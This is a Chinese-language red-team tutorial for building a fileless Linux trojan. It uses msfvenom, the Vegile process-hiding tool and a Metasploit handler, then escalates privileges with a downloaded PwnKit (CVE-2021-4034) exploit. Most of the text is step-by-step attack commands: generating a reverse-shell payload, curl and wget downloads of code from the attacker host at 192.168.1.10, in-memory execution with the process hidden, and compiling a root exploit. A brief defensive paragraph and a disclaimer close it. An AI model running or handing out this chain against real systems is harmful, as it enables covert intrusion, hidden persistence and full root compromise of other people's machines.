红队实战：利用Metasploit与Vegile打造Linux无文件木马

1. 环境准备

攻击机：Kali Linux (IP: 192.168.1.10)靶机：Ubuntu 20.04 (IP: 192.168.1.20)确保网络互通，关闭靶机防火墙或允许入站连接。

2. 生成Metasploit后门shellcode

在攻击机上使用msfvenom生成raw格式的shellcode：

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o /var/www/html/shell.raw

启动HTTP服务托管该文件：

cd /var/www/htmlpython3 -m http.server 80

3. 准备Vegile工具

Vegile是一个强大的进程隐藏和后门工具，支持内存执行shellcode。在靶机上，通过curl将Vegile下载到内存文件系统/dev/shm（此举本身符合无文件理念，因为/dev/shm是tmpfs，重启即消失）：

curl -o /dev/shm/veglie http://192.168.1.10/veglie   # 假设veglie已放置于web目录chmod +x /dev/shm/veglie

如果攻击机没有Vegile二进制，可从GitHub下载并编译，或使用预编译版本。

4. 使用Vegile执行无文件木马

运行Vegile，从远程URL加载shellcode并注入内存，同时隐藏进程：

/dev/shm/veglie --url http://192.168.1.10/shell.raw --os linux --arch x64 --hide

该命令将shellcode直接加载到内存执行，不在磁盘留下任何恶意文件，实现真正的Linux无文件木马。

5. 启动Metasploit监听

在攻击机上启动Metasploit，配置handler监听反向连接：

msfconsoleuse exploit/multi/handlerset payload linux/x64/shell_reverse_tcpset LHOST 192.168.1.10set LPORT 4444exploit -j

当靶机执行Vegile后，将获得一个反弹shell。

6. 提权操作——rootdown

获取初始访问后，进行信息收集与提权。运行id查看当前用户，尝试sudo、suid提权：

sudo -lfind / -perm -4000 2>/dev/null

若存在已知漏洞，可下载对应提权exp，例如CVE-2021-4034：

wget http://192.168.1.10/pwnkit.c -O /tmp/pwnkit.cgcc /tmp/pwnkit.c -o /tmp/pwnkit/tmp/pwnkit

成功执行后获得root权限，至此完成rootdown提权。

7. 防御建议

针对Linux无文件木马和Metasploit后门，企业应部署EDR监控内存执行、异常进程行为；限制/dev/shm等可执行权限；使用SELinux/AppArmor；定期漏洞扫描。

本文仅用于安全研究与授权测试，请勿用于非法用途。